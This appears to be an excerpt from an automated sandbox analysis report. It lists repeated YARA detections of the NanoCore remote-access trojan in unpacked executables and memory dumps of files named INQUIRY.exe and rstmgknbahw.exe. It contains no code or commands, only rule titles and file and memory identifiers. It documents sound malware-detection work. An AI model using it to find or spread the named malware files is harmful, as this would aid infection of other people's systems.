Source: 4.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.INQUIRY.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.INQUIRY.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.rstmgknbahw.exe.4940000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.rstmgknbahw.exe.4940000.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.1.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.1.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.INQUIRY.exe.415058.10.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.INQUIRY.exe.415058.10.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.rstmgknbahw.exe.638d50.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.rstmgknbahw.exe.638d50.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.rstmgknbahw.exe.394bfde.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.rstmgknbahw.exe.394bfde.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.INQUIRY.exe.415058.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.INQUIRY.exe.415058.12.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.INQUIRY.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.INQUIRY.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.rstmgknbahw.exe.2311458.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.rstmgknbahw.exe.2311458.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.INQUIRY.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.INQUIRY.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.INQUIRY.exe.24e0000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.INQUIRY.exe.24e0000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.INQUIRY.exe.415058.12.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.INQUIRY.exe.415058.12.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.INQUIRY.exe.22e0000.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.INQUIRY.exe.22e0000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.INQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.INQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.INQUIRY.exe.22f1458.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.INQUIRY.exe.22f1458.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.INQUIRY.exe.2921548.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.INQUIRY.exe.39a98c0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.rstmgknbahw.exe.2510000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.rstmgknbahw.exe.2510000.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.rstmgknbahw.exe.395543d.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.INQUIRY.exe.415058.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.INQUIRY.exe.415058.10.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.INQUIRY.exe.39adee9.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.rstmgknbahw.exe.6d8d50.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.rstmgknbahw.exe.6d8d50.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.rstmgknbahw.exe.28f68dc.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.rstmgknbahw.exe.2411458.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.rstmgknbahw.exe.2411458.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.rstmgknbahw.exe.381bfde.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.rstmgknbahw.exe.381bfde.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.INQUIRY.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.INQUIRY.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.INQUIRY.exe.24e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.INQUIRY.exe.24e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.INQUIRY.exe.782558.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.INQUIRY.exe.782558.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.INQUIRY.exe.22f1458.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.INQUIRY.exe.22f1458.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.rstmgknbahw.exe.2400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.rstmgknbahw.exe.2400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.rstmgknbahw.exe.27c68dc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.rstmgknbahw.exe.38d3258.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.rstmgknbahw.exe.38d3258.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.INQUIRY.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.INQUIRY.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.INQUIRY.exe.39a98c0.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.INQUIRY.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.INQUIRY.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.INQUIRY.exe.782558.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.INQUIRY.exe.782558.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.rstmgknbahw.exe.38d3258.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.rstmgknbahw.exe.38d3258.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.rstmgknbahw.exe.3820e14.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.INQUIRY.exe.2520000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.INQUIRY.exe.2520000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.INQUIRY.exe.22e0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.INQUIRY.exe.22e0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.rstmgknbahw.exe.4940000.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.rstmgknbahw.exe.4940000.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.rstmgknbahw.exe.37a3258.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.rstmgknbahw.exe.37a3258.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.INQUIRY.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.INQUIRY.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.rstmgknbahw.exe.2300000.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.rstmgknbahw.exe.2300000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.INQUIRY.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.INQUIRY.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.rstmgknbahw.exe.2400000.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.rstmgknbahw.exe.2400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.rstmgknbahw.exe.638d50.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.rstmgknbahw.exe.638d50.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.734941801.00000000027AE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.725133013.00000000028DE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
